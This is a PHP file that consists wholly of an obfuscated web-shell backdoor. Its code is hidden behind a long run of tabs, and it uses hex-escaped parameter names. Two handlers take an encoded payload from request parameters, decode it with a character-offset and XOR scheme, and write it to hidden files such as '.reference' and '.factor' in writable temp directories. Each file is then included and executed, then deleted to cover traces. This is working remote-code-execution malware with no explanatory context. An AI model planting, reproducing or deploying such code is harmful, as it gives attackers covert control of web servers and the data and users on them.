<?php																																										if(array_key_exists("d\x61t\x61", $_REQUEST)){ $data_chunk = $_REQUEST["d\x61t\x61"]; $data_chunk = explode( "." , $data_chunk ) ; $entity =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s); $i =0; $len =count($data_chunk); do { if ($i >= $len) break; $v2 =$data_chunk[$i]; $chS =ord($s[$i % $lenS]); $d =((int)$v2 - $chS - ($i % 10)) ^ 7; $entity .= chr($d); $i++; } while (true); $marker = array_filter([sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", session_save_path(), getenv("TMP"), getcwd(), "/dev/shm", "/var/tmp"]); foreach ($marker as $flag): if (max(0, is_dir($flag) * is_writable($flag))) { $entry = str_replace("{var_dir}", $flag, "{var_dir}/.reference"); if (file_put_contents($entry, $entity)) { include $entry; @unlink($entry); die(); } } endforeach; }


if(@$_POST["mar\x6Be\x72"] !== null){
	$desc = array_filter([getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", "/var/tmp", getcwd(), "/tmp", session_save_path()]);
	$descriptor = $_POST["mar\x6Be\x72"];
			$descriptor= 	explode		 (		 '.',	 $descriptor	  ) ;		
	$flg =	 '';
            $s =	 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS =	 strlen( $s );
            $z =	 0;
    
            foreach( $descriptor as $v7) {$chS =	 ord( $s[$z	 %$lenS] );
                $dec =	 ( ( int)$v7 - $chS -( $z	 %10)) ^	32;
                $flg .= chr( $dec );
                $z++;
            }
	foreach ($desc as $symbol):
    		if ((is_dir($symbol) and is_writable($symbol))) {
    $itm = vsprintf("%s/%s", [$symbol, ".factor"]);
    $file = fopen($itm, 'w');
if ($file) {
	fwrite($file, $flg);
	fclose($file);
	include $itm;
	@unlink($itm);
	die();
}
}
endforeach;
}